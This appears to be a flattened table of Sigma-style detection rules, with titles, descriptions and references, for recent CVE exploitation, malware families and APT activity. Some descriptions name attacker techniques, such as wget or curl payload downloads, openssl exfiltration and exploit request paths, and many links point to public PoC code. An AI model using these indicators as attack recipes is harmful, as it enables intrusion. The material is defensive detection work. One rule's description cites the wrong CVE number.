https://github.com/nathan31337/Splunk-RCE-poc/, https://blog.hrncirik.net/cve-2023-46214-analysis, https://advisory.splunk.com/advisories/SVD-2023-1104 |
Exploitation Attempt Of CVE-2023-46214 Using Public POC Code |
Detects exploitation attempt of CVE-2023-46214, a remote code execution (RCE) in Splunk Enterprise through insecure XML parsing using known public proof of concept code
|
https://github.com/nathan31337/Splunk-RCE-poc/, https://blog.hrncirik.net/cve-2023-46214-analysis, https://advisory.splunk.com/advisories/SVD-2023-1104 |
CVE-2023-46747 Exploitation Activity - Proxy |
Detects exploitation activity of CVE-2023-46747 an unauthenticated remote code execution vulnerability in F5 BIG-IP. |
https://github.com/AliBrTab/CVE-2023-46747-POC/tree/main, https://github.com/0xorOne/nuclei-templates/blob/2fef4270ec6e5573d0a1732cb18bcfc4b1580a88/http/cves/2023/CVE-2023-46747.yaml, https://mp.weixin.qq.com/s/wUoBy7ZiqJL2CUOMC-8Wdg, https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747/ |
CVE-2023-46747 Exploitation Activity - Webserver |
Detects exploitation activity of CVE-2023-46747 an unauthenticated remote code execution vulnerability in F5 BIG-IP. |
https://github.com/AliBrTab/CVE-2023-46747-POC/tree/main, https://github.com/0xorOne/nuclei-templates/blob/2fef4270ec6e5573d0a1732cb18bcfc4b1580a88/http/cves/2023/CVE-2023-46747.yaml, https://mp.weixin.qq.com/s/wUoBy7ZiqJL2CUOMC-8Wdg, https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747/ |
CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Proxy |
Detects exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via proxy logs by looking for a very long host header string. |
https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967, https://attackerkb.com/topics/2faW2CxJgQ/cve-2023-4966, https://www.rapid7.com/blog/post/2023/10/25/etr-cve-2023-4966-exploitation-of-citrix-netscaler-information-disclosure-vulnerability/, https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966, https://github.com/assetnote/exploits/tree/main/citrix/CVE-2023-4966 |
CVE-2023-4966 Potential Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Proxy |
Detects potential exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via proxy logs. |
https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967, https://attackerkb.com/topics/2faW2CxJgQ/cve-2023-4966, https://www.rapid7.com/blog/post/2023/10/25/etr-cve-2023-4966-exploitation-of-citrix-netscaler-information-disclosure-vulnerability/, https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966, https://github.com/assetnote/exploits/tree/main/citrix/CVE-2023-4966 |
CVE-2023-4966 Potential Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Webserver |
Detects potential exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via webserver logs. |
https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967, https://attackerkb.com/topics/2faW2CxJgQ/cve-2023-4966, https://www.rapid7.com/blog/post/2023/10/25/etr-cve-2023-4966-exploitation-of-citrix-netscaler-information-disclosure-vulnerability/, https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966, https://github.com/assetnote/exploits/tree/main/citrix/CVE-2023-4966 |
CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Webserver |
Detects exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via webserver logs by looking for a very long host header string. |
https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967, https://attackerkb.com/topics/2faW2CxJgQ/cve-2023-4966, https://www.rapid7.com/blog/post/2023/10/25/etr-cve-2023-4966-exploitation-of-citrix-netscaler-information-disclosure-vulnerability/, https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966, https://github.com/assetnote/exploits/tree/main/citrix/CVE-2023-4966 |
Potential Exploitation Attempt Of Undocumented WindowsServer RCE |
Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE) |
https://github.com/SigmaHQ/sigma/pull/3946, https://twitter.com/hackerfantastic/status/1616455335203438592?s=20 |
Potential SocGholish Second Stage C2 DNS Query |
Detects a DNS query initiated from a "wscript" process for domains matching a specific pattern that was seen being used by SocGholish for its Command and Control traffic |
https://www.virustotal.com/gui/file/0e2854753d17b1bb534de8e765d5813c9fb584a745978b3d92bc6ca78e3e7735/relations, https://www.virustotal.com/gui/file/d5661009c461a8b20e1ad22f48609cc84dd90aee9182e026659dde4d46aaf25e/relations, https://www.proofpoint.com/us/blog/threat-insight/part-1-socgholish-very-real-threat-very-fake-update |
Potential COLDSTEEL RAT File Indicators |
Detects the creation of a file named "dllhost.exe" in the "C:\users\public\Documents\" directory. Seen being used by the COLDSTEEL RAT in some of its variants. |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf |
Potential COLDSTEEL Persistence Service DLL Creation |
Detects the creation of a file in a specific location and with a specific name related to COLDSTEEL RAT |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf |
Potential COLDSTEEL Persistence Service DLL Load |
Detects a suspicious DLL load by an "svchost" process based on location and name that might be related to ColdSteel RAT. This DLL location and name has been seen used by ColdSteel as the service DLL for its persistence mechanism
|
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf |
COLDSTEEL RAT Anonymous User Process Execution |
Detects the creation of a process executing as user called "ANONYMOUS" seen used by the "MileStone2016" variant of COLDSTEEL |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf |
COLDSTEEL RAT Cleanup Command Execution |
Detects the creation of a "rundll32" process from the ColdSteel persistence service to initiate the cleanup command by calling one of its own exports. This functionality is not present in "MileStone2017" and some "MileStone2016" samples |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf |
COLDSTEEL RAT Service Persistence Execution |
Detects the creation of an "svchost" process with specific command line flags, that were seen present and used by ColdSteel RAT |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf |
Potential COLDSTEEL RAT Windows User Creation |
Detects creation of a new user profile with a specific username, seen being used by some variants of the COLDSTEEL RAT. |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf |
COLDSTEEL Persistence Service Creation |
Detects the creation of new services potentially related to COLDSTEEL RAT |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf |
DarkGate - Autoit3.EXE File Creation By Uncommon Process |
Detects the usage of curl.exe, KeyScramblerLogon, or other non-standard/suspicious processes used to create Autoit3.exe.
This activity has been associated with DarkGate malware, which uses Autoit3.exe to execute shellcode that performs
process injection and connects to the DarkGate command-and-control server. Curl, KeyScramblerLogon, and these other
processes consitute non-standard and suspicious ways to retrieve the Autoit3 executable.
|
https://github.security.telekom.com/2023/08/darkgate-loader.html, https://www.kroll.com/en/insights/publications/cyber/microsoft-teams-used-as-initial-access-for-darkgate-malware, https://github.com/pr0xylife/DarkGate/tree/main |
DarkGate - Autoit3.EXE Execution Parameters |
Detects execution of the legitimate Autoit3 utility from a suspicious parent process. AutoIt3.exe is used within
the DarkGate infection chain to execute shellcode that performs process injection and connects to the DarkGate
command-and-control server.
|
https://github.security.telekom.com/2023/08/darkgate-loader.html, https://www.kroll.com/en/insights/publications/cyber/microsoft-teams-used-as-initial-access-for-darkgate-malware, https://github.com/pr0xylife/DarkGate/tree/main |
DarkGate - User Created Via Net.EXE |
Detects creation of local users via the net.exe command with the name of "DarkGate" |
Internal Research |
Griffon Malware Attack Pattern |
Detects process execution patterns related to Griffon malware as reported by Kaspersky |
https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/ |
Injected Browser Process Spawning Rundll32 - GuLoader Activity |
Detects the execution of installed GuLoader malware on the host.
GuLoader is initiating network connections via the rundll32.exe process that is spawned via a browser parent(injected) process.
|
Internal Research |
IcedID Malware Suspicious Single Digit DLL Execution Via Rundll32 |
Detects RunDLL32.exe executing a single digit DLL named "1.dll" with the export function "DllRegisterServer". This behaviour was often seen used by malware and especially IcedID |
https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/, https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/ |
Potential Pikabot C2 Activity |
Detects the execution of rundll32 that leads to an external network connection.
The malware Pikabot has been seen to use this technique to initiate C2-communication through hard-coded Windows binaries.
|
https://www.virustotal.com/gui/file/d72af640b71b8e3eca3eba660dd7c7f029ff8852bcacaa379e7b6c57cf4d9b44, https://www.virustotal.com/gui/file/6bb4cdbaef03b732a93559a58173e7f16b29bfb159a1065fae9185000ff23b4b, https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_06.12.2023.txt |
Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE |
Detects the execution of concatenated commands via "cmd.exe". Pikabot often executes a combination of multiple commands via the command handler "cmd /c" in order to download and execute additional payloads.
Commands such as "curl", "wget" in order to download extra payloads. "ping" and "timeout" are abused to introduce delays in the command execution and "Rundll32" is also used to execute malicious DLL files.
In the observed Pikabot infections, a combination of the commands described above are used to orchestrate the download and execution of malicious DLL files.
|
https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_30.10.2023.txt, https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_22.12.2023.txt |
Potential Pikabot Discovery Activity |
Detects system discovery activity carried out by Pikabot, such as incl. network, user info and domain groups.
The malware Pikabot has been seen to use this technique as part of its C2-botnet registration with a short collection time frame (less than 1 minute).
|
https://www.virustotal.com/gui/file/72f1a5476a845ea02344c9b7edecfe399f64b52409229edaf856fcb9535e3242, https://tria.ge/231023-lpw85she57/behavioral2 |
Potential Pikabot Hollowing Activity |
Detects the execution of rundll32 that leads to the invocation of legitimate Windows binaries.
The malware Pikabot has been seen to use this technique for process hollowing through hard-coded Windows binaries
|
https://www.virustotal.com/gui/file/b6e8910fb9b3bb1fcddefd35ff0ed8624930d30d6977e11808c8330415685a62, https://www.virustotal.com/gui/file/6bb4cdbaef03b732a93559a58173e7f16b29bfb159a1065fae9185000ff23b4b, https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_06.12.2023.txt |
Pikabot Fake DLL Extension Execution Via Rundll32.EXE |
Detects specific process tree behavior linked to "rundll32" executions, wherein the associated DLL lacks a common ".dll" extension, often signaling potential Pikabot activity.
|
https://github.com/pr0xylife/Pikabot, https://tria.ge/231004-tp8k6sch9t/behavioral2, https://www.virustotal.com/gui/file/56db0c4842a63234ab7fe2dda6eeb63aa7bb68f9a456985b519122f74dea37e2/behavior, https://tria.ge/231212-r1bpgaefar/behavioral2 |
Qakbot Regsvr32 Calc Pattern |
Detects a specific command line of "regsvr32" where the "calc" keyword is used in conjunction with the "/s" flag. This behavior is often seen used by Qakbot |
https://github.com/pr0xylife/Qakbot/ |
Potential Qakbot Rundll32 Execution |
Detects specific process tree behavior of a "rundll32" execution often linked with potential Qakbot activity. |
https://github.com/pr0xylife/Qakbot/ |
Qakbot Rundll32 Exports Execution |
Detects specific process tree behavior of a "rundll32" execution with exports linked with Qakbot activity. |
https://github.com/pr0xylife/Qakbot/ |
Qakbot Rundll32 Fake DLL Extension Execution |
Detects specific process tree behavior of a "rundll32" execution where the DLL doesn't have the ".dll" extension. This is often linked with potential Qakbot activity. |
https://github.com/pr0xylife/Qakbot/ |
Qakbot Uninstaller Execution |
Detects the execution of the Qakbot uninstaller file mentioned in the USAO-CDCA document on the disruption of the Qakbot malware and botnet |
https://www.justice.gov/usao-cdca/divisions/national-security-division/qakbot-resources, https://www.virustotal.com/gui/file/7cdee5a583eacf24b1f142413aabb4e556ccf4ef3a4764ad084c1526cc90e117/community, https://www.virustotal.com/gui/file/fab408536aa37c4abc8be97ab9c1f86cb33b63923d423fdc2859eb9d63fa8ea0/community |
Rhadamanthys Stealer Module Launch Via Rundll32.EXE |
Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023 |
https://elis531989.medium.com/dancing-with-shellcodes-analyzing-rhadamanthys-stealer-3c4986966a88, https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/, https://www.joesandbox.com/analysis/790122/0/html, https://twitter.com/anfam17/status/1607477672057208835 |
Rorschach Ransomware Execution Activity |
Detects Rorschach ransomware execution activity |
https://research.checkpoint.com/2023/rorschach-a-new-sophisticated-and-fast-ransomware/ |
SNAKE Malware Kernel Driver File Indicator |
Detects SNAKE malware kernel driver file indicator |
https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF |
SNAKE Malware WerFault Persistence File Creation |
Detects the creation of a file named "WerFault.exe" in the WinSxS directory by a non-system process, which can be indicative of potential SNAKE malware activity |
https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF |
SNAKE Malware Installer Name Indicators |
Detects filename indicators associated with the SNAKE malware as reported by CISA in their report |
https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF |
Potential SNAKE Malware Installation CLI Arguments Indicator |
Detects a specific command line arguments sequence seen used by SNAKE malware during its installation as described by CISA in their report |
https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF |
Potential SNAKE Malware Installation Binary Indicator |
Detects a specific binary name seen used by SNAKE malware during its installation as described by CISA in their report |
https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF |
Potential SNAKE Malware Persistence Service Execution |
Detects a specific child/parent process relationship indicative of a "WerFault" process running from the "WinSxS" as a service. This could be indicative of potential SNAKE malware activity as reported by CISA. |
https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF |
SNAKE Malware Covert Store Registry Key |
Detects any registry event that targets the key 'SECURITY\Policy\Secrets\n' which is a key related to SNAKE malware as described by CISA |
https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF |
Potential Encrypted Registry Blob Related To SNAKE Malware |
Detects the creation of a registry value in the ".wav\OpenWithProgIds" key with an uncommon name. This could be related to SNAKE Malware as reported by CISA |
https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF |
SNAKE Malware Service Persistence |
Detects the creation of a service named "WerFaultSvc" which seems to be used by the SNAKE malware as a persistence mechanism as described by CISA in their report |
https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF |
Ursnif Redirection Of Discovery Commands |
Detects the redirection of Ursnif discovery commands as part of the initial execution of the malware.
|
Internal Research |
Potential Compromised 3CXDesktopApp Beaconing Activity - DNS |
Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise |
https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/ |
Malicious DLL Load By Compromised 3CXDesktopApp |
Detects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp |
https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/ |
Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon |
Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise |
https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/ |
Potential Compromised 3CXDesktopApp Execution |
Detects execution of known compromised version of 3CXDesktopApp |
https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/ |
Potential Suspicious Child Process Of 3CXDesktopApp |
Detects potential suspicious child processes of "3CXDesktopApp.exe". Which could be related to the 3CXDesktopApp supply chain compromise |
https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/, https://www.crowdstrike.com/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers/ |
Potential Compromised 3CXDesktopApp Update Activity |
Detects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software |
https://www.linkedin.com/feed/update/urn:li:activity:7047435754834198529/, https://www.huntress.com/blog/3cx-voip-software-compromise-supply-chain-threats |
Potential Compromised 3CXDesktopApp Beaconing Activity - Proxy |
Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise |
https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/ |
DLL Names Used By SVR For GraphicalProton Backdoor |
Hunts known SVR-specific DLL names. |
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a |
Potential Compromised 3CXDesktopApp ICO C2 File Download |
Detects potential malicious .ICO files download from a compromised 3CXDesktopApp via web requests to the the malicious Github repository |
https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/, https://www.linkedin.com/feed/update/urn:li:activity:7047435754834198529/ |
Scheduled Tasks Names Used By SVR For GraphicalProton Backdoor |
Hunts for known SVR-specific scheduled task names |
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a |
Scheduled Tasks Names Used By SVR For GraphicalProton Backdoor - Task Scheduler |
Hunts for known SVR-specific scheduled task names |
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a |
Diamond Sleet APT DNS Communication Indicators |
Detects DNS queries related to Diamond Sleet APT activity |
https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/ |
Diamond Sleet APT File Creation Indicators |
Detects file creation activity that is related to Diamond Sleet APT activity |
https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/ |
Diamond Sleet APT DLL Sideloading Indicators |
Detects DLL sideloading activity seen used by Diamond Sleet APT |
https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/ |
Diamond Sleet APT Process Activity Indicators |
Detects process creation activity indicators related to Diamond Sleet APT |
https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/ |
Diamond Sleet APT Scheduled Task Creation - Registry |
Detects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability
|
https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/ |
Diamond Sleet APT Scheduled Task Creation |
Detects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability
|
https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/ |
Potential Operation Triangulation C2 Beaconing Activity - DNS |
Detects potential beaconing activity to domains used in 0day attacks on iOS devices and revealed by Kaspersky and the FSB |
https://securelist.com/operation-triangulation/109842/, https://www-fsb-ru.translate.goog/fsb/press/message/single.htm!id=10439739@fsbMessage.html?_x_tr_sch=http&_x_tr_sl=ru&_x_tr_tl=en&_x_tr_hl=de&_x_tr_pto=wapp |
Potential Operation Triangulation C2 Beaconing Activity - Proxy |
Detects potential beaconing activity to domains used in 0day attacks on iOS devices and revealed by Kaspersky and the FSB |
https://securelist.com/operation-triangulation/109842/, https://www-fsb-ru.translate.goog/fsb/press/message/single.htm!id=10439739@fsbMessage.html?_x_tr_sch=http&_x_tr_sl=ru&_x_tr_tl=en&_x_tr_hl=de&_x_tr_pto=wapp |
Potential APT FIN7 Related PowerShell Script Created |
Detects PowerShell script file creation with specific name or suffix which was seen being used often by FIN7 PowerShell scripts |
https://labs.withsecure.com/publications/fin7-target-veeam-servers |
Potential APT FIN7 POWERHOLD Execution |
Detects execution of the POWERHOLD script seen used by FIN7 as reported by WithSecureLabs |
https://labs.withsecure.com/publications/fin7-target-veeam-servers |
Potential POWERTRASH Script Execution |
Detects potential execution of the PowerShell script POWERTRASH |
https://labs.withsecure.com/publications/fin7-target-veeam-servers |
Potential APT FIN7 Reconnaissance/POWERTRASH Related Activity |
Detects specific command line execution used by FIN7 as reported by WithSecureLabs for reconnaissance and POWERTRASH execution |
https://labs.withsecure.com/publications/fin7-target-veeam-servers, https://labs.withsecure.com/publications/fin7-target-veeam-servers/jcr:content/root/responsivegrid/responsivegrid/responsivegrid/image_253944286.img.png/1682500394900.png, https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv |
Lace Tempest File Indicators |
Detects PowerShell script file creation with specific names or suffixes which was seen being used often in PowerShell scripts by FIN7 |
https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification |
Lace Tempest PowerShell Evidence Eraser |
Detects a PowerShell script used by Lace Tempest APT to erase evidence from victim servers by exploiting CVE-2023-47246 as reported by SysAid Team
|
https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification |
Lace Tempest PowerShell Launcher |
Detects a PowerShell script used by Lace Tempest APT to launch their malware loader by exploiting CVE-2023-47246 as reported by SysAid Team
|
https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification |
Lace Tempest Cobalt Strike Download |
Detects specific command line execution used by Lace Tempest to download Cobalt Strike as reported by SysAid Team |
https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification |
Lace Tempest Malware Loader Execution |
Detects execution of a specific binary based on filename and hash used by Lace Tempest to load additional malware as reported by SysAid Team |
https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification |
Lazarus APT DLL Sideloading Activity |
Detects sideloading of trojanized DLLs used in Lazarus APT campaign in the case of a Spanish aerospace company |
https://www.welivesecurity.com/en/eset-research/lazarus-luring-employees-trojanized-coding-challenges-case-spanish-aerospace-company/, https://www.bleepingcomputer.com/news/security/lazarus-hackers-breach-aerospace-firm-with-new-lightlesscan-malware/ |
Mint Sandstorm - AsperaFaspex Suspicious Process Execution |
Detects suspicious execution from AsperaFaspex as seen used by Mint Sandstorm |
https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/ |
Mint Sandstorm - Log4J Wstomcat Process Execution |
Detects Log4J Wstomcat process execution as seen in Mint Sandstorm activity |
https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/ |
Mint Sandstorm - ManageEngine Suspicious Process Execution |
Detects suspicious execution from ManageEngine as seen used by Mint Sandstorm |
https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/ |
Potential APT Mustang Panda Activity Against Australian Gov |
Detects specific command line execution used by Mustang Panda in a targeted attack against the Australian government as reported by Lab52 |
https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/ |
Okta 2023 Breach Indicator Of Compromise |
Detects new user account creation or activation with specific names related to the Okta Support System 2023 breach.
This rule can be enhanced by filtering out known and legitimate username used in your environnement.
|
https://www.beyondtrust.com/blog/entry/okta-support-unit-breach, https://developer.okta.com/docs/reference/api/event-types/ |
Onyx Sleet APT File Creation Indicators |
Detects file creation activity that is related to Onyx Sleet APT activity |
https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/ |
PaperCut MF/NG Exploitation Related Indicators |
Detects exploitation indicators related to PaperCut MF/NG Exploitation |
https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software, https://www.papercut.com/kb/Main/PO-1216-and-PO-1219 |
PaperCut MF/NG Potential Exploitation |
Detects suspicious child processes of "pc-app.exe". Which could indicate potential exploitation of PaperCut |
https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software, https://github.com/huntresslabs/threat-intel/blob/main/2023/2023-04/20-PaperCut/win_susp_papercut_code_execution.yml |
Peach Sandstorm APT Process Activity Indicators |
Detects process creation activity related to Peach Sandstorm APT |
https://twitter.com/MsftSecIntel/status/1737895710169628824, https://www.virustotal.com/gui/file/364275326bbfc4a3b89233dabdaf3230a3d149ab774678342a40644ad9f8d614/details |
Potential Peach Sandstorm APT C2 Communication Activity |
Detects potential C2 communication activity related to Peach Sandstorm APT |
https://twitter.com/MsftSecIntel/status/1737895710169628824, https://www.virustotal.com/gui/file/364275326bbfc4a3b89233dabdaf3230a3d149ab774678342a40644ad9f8d614/details |
UNC4841 - Email Exfiltration File Pattern |
Detects filename pattern of email related data used by UNC4841 for staging and exfiltration |
https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally |
UNC4841 - Barracuda ESG Exploitation Indicators |
Detects file indicators as seen used by UNC4841 during their Barracuda ESG zero day exploitation. |
https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally |
UNC4841 - SSL Certificate Exfiltration Via Openssl |
Detects the execution of "openssl" to connect to an IP address. This techniques was used by UNC4841 to exfiltrate SSL certificates and as a C2 channel with named pipes. Investigate commands executed in the temporal vicinity of this command. |
https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally |
UNC4841 - Download Compressed Files From Temp.sh Using Wget |
Detects execution of "wget" to download a ".zip" or ".rar" files from "temp.sh". As seen used by UNC4841 during their Barracuda ESG zero day exploitation. |
https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally |
UNC4841 - Download Tar File From Untrusted Direct IP Via Wget |
Detects execution of "wget" to download a "tar" from an IP address that doesn't have a trusted certificate. As seen used by UNC4841 during their Barracuda ESG zero day exploitation. |
https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally |
UNC4841 - Potential SEASPY Execution |
Detects execution of specific named binaries which were used by UNC4841 to deploy their SEASPY backdoor |
https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally |
CVE-2024-1212 Exploitation - Progress Kemp LoadMaster Unauthenticated Command Injection |
Detects potential exploitation of CVE-2024-1709 an unauthenticated command injection in Progress Kemp LoadMaster.
It looks for GET requests to '/access/set' API with the parameters 'param=enableapi' and 'value=1' as well as an "Authorization" header with a base64 encoded value with an uncommon character.
|
https://github.com/RhinoSecurityLabs/CVEs/blob/15cf4d86c83daa57b59eaa2542a0ed47ad3dc32d/CVE-2024-1212/CVE-2024-1212.py, https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/ |
CVE-2024-1708 - ScreenConnect Path Traversal Exploitation |
This detects file modifications to ASPX and ASHX files within the root of the App_Extensions directory, which is allowed by a ZipSlip vulnerability in versions prior to 23.9.8. This occurs during exploitation of CVE-2024-1708.
|
https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8, https://www.cve.org/CVERecord?id=CVE-2024-1709, https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass |
CVE-2024-1708 - ScreenConnect Path Traversal Exploitation - Security |
This detects file modifications to ASPX and ASHX files within the root of the App_Extensions directory, which is allowed by a ZipSlip vulnerability in versions prior to 23.9.8. This occurs during exploitation of CVE-2024-1708.
This requires an Advanced Auditing policy to log a successful Windows Event ID 4663 events and with a SACL set on the directory.
|
https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8, https://www.cve.org/CVERecord?id=CVE-2024-1708, https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass |
ScreenConnect User Database Modification |
Detects file modifications to the temporary xml user database file indicating local user modification in the ScreenConnect server.
This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions.
|
https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8, https://www.cve.org/CVERecord?id=CVE-2024-1709, https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass |
CVE-2024-1709 - ScreenConnect Authentication Bypass Exploitation |
Detects GET requests to '/SetupWizard.aspx/[anythinghere]' that indicate exploitation of the ScreenConnect vulnerability CVE-2024-1709.
|
